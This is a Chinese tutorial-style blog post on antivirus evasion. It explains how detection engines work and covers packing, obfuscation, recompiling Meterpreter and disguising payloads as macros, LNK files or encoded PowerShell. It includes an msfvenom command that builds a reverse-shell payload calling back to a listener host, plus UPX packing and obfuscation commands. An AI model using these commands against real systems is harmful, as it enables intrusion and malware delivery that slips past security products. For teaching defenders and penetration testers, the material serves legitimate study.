关于 免杀(上)

网络安全中的免杀技术:原理、方法与防御

免杀(Anti-AntiVirus,简称 AAV)是绕过杀毒软件、入侵检测系统(IDS)、入侵防御系统(IPS)等安全产品检测的技术,广泛应用于渗透测试的 payload 投递环节,同时也是恶意代码逃避查杀的核心手段。

在合法的渗透测试场景中,免杀是验证目标网络防御有效性的重要技术;但在黑产领域,免杀会被用于传播病毒、木马等恶意程序,需严格区分合法用途与非法滥用的边界。

一、免杀的核心原理

杀毒软件的检测机制主要分为 特征码检测、行为检测、启发式检测、云检测 四类,免杀技术本质就是针对这些检测机制的规避手段。

  1. 特征码检测 杀毒软件会提取恶意程序的唯一特征(如特定字节序列、哈希值 MD5/SHA1)存入病毒库,扫描时比对文件特征。免杀核心思路:修改特征码,让程序脱离病毒库的匹配范围。
  2. 行为检测 监控程序运行时的恶意行为(如创建后门、远程连接、修改注册表、注入进程),通过行为规则判定恶意性。免杀核心思路:隐藏或伪装恶意行为,如延迟执行、分段执行、模拟正常程序行为。
  3. 启发式检测 不依赖病毒库,通过分析程序的代码结构、指令序列(如调用敏感 API、内存操作),预判程序是否存在潜在威胁。免杀核心思路:模糊代码逻辑、混淆敏感指令,降低启发式引擎的识别概率。
  4. 云检测 将文件哈希、特征信息上传至云端进行比对,结合大数据分析判定恶意性。免杀核心思路:避免文件特征入库,如使用动态生成 payload、加密传输数据。

二、静态免杀

静态免杀:修改文件特征,规避特征码 / 启发式检测

  1. 加壳 / 加花指令

    • 原理:加壳是对程序进行加密压缩,运行时由壳代码解密后再执行,隐藏原始程序的特征码;加花指令是在程序头部 / 尾部添加无意义的指令(如空指令、垃圾代码),改变文件的字节特征,不影响程序功能。

    • 工具

      • 压缩壳:UPX、ASPack(易被杀毒软件识别,需搭配其他方法);
      • 加密壳:VMProtect、Themida(强度较高,通过虚拟化指令混淆代码);
      • 手动加花:使用汇编器(NASM)编写花指令,通过 HIEW 010 Editor 等十六进制编辑器插入。
    • 实操示例 :对 msfvenom 生成的 payload 进行 UPX 加壳

      bash 复制代码
      # 生成原始 payload(Windows 反向连接)
      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
      # 使用 UPX 加壳压缩
      upx -9 payload.exe -o payload_upx.exe
    • 注意:单纯加壳易被查杀,需结合混淆、加密等手段。

  2. 代码混淆与加密

    • 原理:通过修改代码的语法结构、变量名、函数名,或对核心代码进行加密(如 AES、RC4 加密),隐藏敏感逻辑,规避启发式检测。
    • 适用场景:自定义编写的木马、脚本类 payload(如 Python、PowerShell、C# 代码)。
    • 工具与实操
      • Python 脚本混淆 :使用 pyminifier 混淆代码,或对核心功能进行 AES 加密,运行时解密执行

        bash 复制代码
        # 安装 pyminifier
        pip install pyminifier
        # 混淆 Python 脚本
        pyminifier --obfuscate=1 --rename-globals payload.py -o payload_obf.py
      • C# 代码混淆 :使用 ConfuserEx 工具,通过控制流混淆、字符串加密、虚方法注入等方式混淆程序集。

    • 核心技巧:避免硬编码敏感数据(如 IP、端口),改为运行时从配置文件 / 网络获取。
  3. 重编译与特征修改

    • 原理:针对开源恶意代码(如 Meterpreter、Cobalt Strike Beacon),修改源代码中的特征字符串、函数名,再重新编译,彻底改变文件特征码。
    • 实操示例 :修改 Meterpreter 源代码
      1. 下载 Metasploit 源码,找到 meterpreter/source 目录下的核心文件;
      2. 替换代码中的特征字符串(如 Meterpreter 改为随机字符串),调整函数的参数顺序;
      3. 使用 MinGW/Visual Studio 重新编译生成 exe 文件。
    • 优势 :修改彻底,免杀效果持久;缺点:需要具备对应编程语言的编译能力。
  4. 文件类型转换

    • 原理:将易被检测的文件类型(如 exe、dll)转换为其他类型(如 scr、bat、ps1),或封装为文档(如 Word、Excel 宏文件)、图片(如 PNG 隐写),利用目标系统的漏洞或信任机制执行。
    • 常见手段
      • 宏病毒免杀 :编写混淆后的 VBA 宏代码,嵌入 Word 文档,通过 Enable Content 触发执行;

      • 脚本免杀 :将 PowerShell 脚本进行 Base64 编码,通过命令行隐蔽执行

        bash 复制代码
        powershell -exec bypass -enc <Base64编码后的脚本>
      • LNK 快捷方式钓鱼:制作恶意 LNK 文件,双击时执行隐藏的 payload。

相关推荐
syseptember5 小时前
Linux网络基础
linux·网络·arm开发
Guheyunyi7 小时前
智能守护:视频安全监测系统的演进与未来
大数据·人工智能·科技·安全·信息可视化
Traced back7 小时前
WinForms 线程安全三剑客详解
安全·c#·winform
Exquisite.8 小时前
企业高性能web服务器(4)
运维·服务器·前端·网络·mysql
汉堡包0018 小时前
【网安基础】--内网代理转发基本流程(正向与反向代理)
安全·web安全·php
qq_4112624210 小时前
用 ESP32-C3 直接连 Starlink 路由器/热点并完成配网
网络·智能路由器
桌面运维家10 小时前
vDisk VOI/IDV权限管理怎么做?安全方案详解
安全
世界尽头与你10 小时前
(修复方案)kibana 未授权访问漏洞
安全·网络安全·渗透测试
xixixi7777711 小时前
今日 AI 、通信、安全行业前沿日报(2026 年 2 月 4 日,星期三)
大数据·人工智能·安全·ai·大模型·通信·卫星通信
LucDelton11 小时前
Java 读取无限量文件读取的思路
java·运维·网络